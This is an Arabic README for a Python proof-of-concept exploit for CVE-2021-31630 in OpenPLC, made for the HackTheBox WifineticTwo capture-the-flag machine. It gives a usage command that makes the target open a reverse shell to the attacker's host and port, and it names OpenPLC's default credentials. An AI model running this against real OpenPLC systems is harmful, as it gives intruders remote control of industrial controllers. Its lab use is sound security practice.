
نص بايثون بسيط لاستغلال CVE-2021-31630 في HTB WifineticTwo CTF
هذا البرنامج النصي بلغة بايثون هو إثبات مفهوم (PoC) لاستغلال الثغرة CVE-2021-31630، والتي تستهدف ثغرة أمنية في OpenPLC تعمل على جهاز WifineticTwo على منصة HackTheBox. تم تصميمه للأغراض التعليمية فقط، بهدف توضيح عملية الاستغلال في بيئة محكومة.
هذه الأداة مخصصة لأغراض البحث الأمني والتعليم فقط. استخدام هذه الأداة لمهاجمة أهداف دون موافقة مسبقة متبادلة غير قانوني. لن يتحمل المطور أي مسؤولية عن أي أضرار أو تهم جنائية ضد المستخدمين الذين يسيئون استخدام هذا الاستغلال.
قبل تشغيل هذا الاستغلال، تأكد من أن لديك:
requests مثبتة. يمكنك تثبيتها باستخدام pip install requests.لاستخدام هذا الاستغلال، يجب عليك تحديد عنوان URL للهدف، وعنوان IP المحلي (LHOST)، والمنفذ المحلي (LPORT) الذي يجب أن يتصل به الصدفة العكسية. اختيارياً، يمكنك تحديد اسم المستخدم وكلمة المرور لـ OpenPLC إذا كانت مختلفة عن الإعدادات الافتراضية.
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
--target - العنوان الأساسي للهدف. مثال: http://wifinetictwo.htb:8080--lhost - عنوان IP للمضيف المحلي للصدفة العكسية لتتصل به.--lport - المنفذ المحلي للصدفة العكسية لتتصل به.--usr - (اختياري) اسم المستخدم لـ OpenPLC. القيمة الافتراضية هي openplc.--pwd - (اختياري) كلمة المرور لـ OpenPLC. القيمة الافتراضية هي openplc.